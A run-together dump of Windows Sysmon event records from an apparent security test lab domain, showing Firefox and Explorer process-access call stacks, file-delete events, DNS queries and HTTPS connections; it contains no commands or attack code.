Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b695f9|C:\Program Files\Mozilla Firefox\xul.dll+b7958a|C:\Program Files\Mozilla Firefox\xul.dll+b56ab9|C:\Program Files\Mozilla Firefox\xul.dll+b6c350|C:\Program Files\Mozilla Firefox\xul.dll+1a24c7c|C:\Program Files\Mozilla Firefox\xul.dll+192fc92|C:\Program Files\Mozilla Firefox\xul.dll+192dfcc|C:\Program Files\Mozilla Firefox\xul.dll+1b1c2f7|C:\Program Files\Mozilla Firefox\xul.dll+1b1b19f|C:\Program Files\Mozilla Firefox\xul.dll+192a5fa|C:\Program Files\Mozilla Firefox\xul.dll+1b3e634|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937 10341000x8000000000000000105276Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.183{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105275Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.183{58E9C193-AE68-615A-C800-00000000FC01}45484800C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105274Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.162{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105273Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.162{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105272Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.147{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105271Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.128{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105270Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.127{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e57449|C:\Program Files\Mozilla Firefox\xul.dll+e4bc5e|C:\Program Files\Mozilla Firefox\xul.dll+e36a01|C:\Program Files\Mozilla Firefox\xul.dll+c6bf21|C:\Program Files\Mozilla Firefox\xul.dll+23a8f1|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+174c0f5|C:\Program Files\Mozilla Firefox\xul.dll+f3d406|C:\Program Files\Mozilla Firefox\xul.dll+3dd4eb|C:\Program Files\Mozilla Firefox\xul.dll+cc301|C:\Program Files\Mozilla Firefox\xul.dll+11b1102|C:\Program Files\Mozilla Firefox\xul.dll+c2d4ae|C:\Program Files\Mozilla Firefox\xul.dll+c2e0bb|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff 23542300x8000000000000000105269Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.093{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46FB33CFFD2115B4F2268457CA77D0D,SHA256=2C387AE36BAEB3E4634E4586A69DDC4C70EA14D9C2800E33FFD797961D94F6C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105268Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.047{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d5e|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+f245a2|C:\Program Files\Mozilla Firefox\xul.dll+1acb272|C:\Program Files\Mozilla Firefox\xul.dll+17779b9|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+108abc|C:\Program Files\Mozilla Firefox\xul.dll+127c9f|C:\Program Files\Mozilla Firefox\xul.dll+11972f9|C:\Program Files\Mozilla Firefox\xul.dll+908818|C:\Program Files\Mozilla Firefox\xul.dll+908f46|C:\Program Files\Mozilla Firefox\xul.dll+22fae0 10341000x8000000000000000105267Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.047{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d37|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+f245a2|C:\Program Files\Mozilla Firefox\xul.dll+1acb272|C:\Program Files\Mozilla Firefox\xul.dll+17779b9|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+108abc|C:\Program Files\Mozilla Firefox\xul.dll+127c9f|C:\Program Files\Mozilla Firefox\xul.dll+11972f9|C:\Program Files\Mozilla Firefox\xul.dll+908818|C:\Program Files\Mozilla Firefox\xul.dll+908f46|C:\Program Files\Mozilla Firefox\xul.dll+22fae0 10341000x8000000000000000105266Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.047{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d0c|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+f245a2|C:\Program Files\Mozilla Firefox\xul.dll+1acb272|C:\Program Files\Mozilla Firefox\xul.dll+17779b9|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+108abc|C:\Program Files\Mozilla Firefox\xul.dll+127c9f|C:\Program Files\Mozilla Firefox\xul.dll+11972f9|C:\Program Files\Mozilla Firefox\xul.dll+908818|C:\Program Files\Mozilla Firefox\xul.dll+908f46|C:\Program Files\Mozilla Firefox\xul.dll+22fae0 10341000x8000000000000000105265Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.047{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4efc8|C:\Program Files\Mozilla Firefox\xul.dll+237c3a2|C:\Program Files\Mozilla Firefox\xul.dll+3629f9c|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105264Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.031{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082823Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:32.620{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1B717B1DE2F422B42A67B5A9AC350A6,SHA256=1F4C0520A792984B61CE9CEDB1258D076FAC02F50C17D009463B2E94ED1E6241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082822Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:32.620{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6923FF1CD5CB35ED407AC63A3F11B013,SHA256=A0DE8E5C9FFC532D771149884AC3E7D00CC31BAD1DDD4D483DBD877597D1E051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082821Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:32.276{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A06DF1980FE448CDE46DA25CD43E8166,SHA256=A52E3CA06641C6E1370D35A20878E7814F56EDB07DE31418B84B4EE646B522D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105529Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.898{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105528Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.093{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51750-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 354300x8000000000000000105527Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.092{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local65276- 354300x8000000000000000105526Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.085{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59186- 354300x8000000000000000105525Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.024{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51748-false52.88.96.248ec2-52-88-96-248.us-west-2.compute.amazonaws.com443https 354300x8000000000000000105524Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.896{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51749-false104.18.164.34-443https 354300x8000000000000000105523Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.895{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63958- 354300x8000000000000000105522Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.893{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63083- 354300x8000000000000000105521Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.874{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51579- 354300x8000000000000000105520Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.869{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59194- 10341000x8000000000000000105519Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105518Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105517Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105516Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105515Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.782{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla 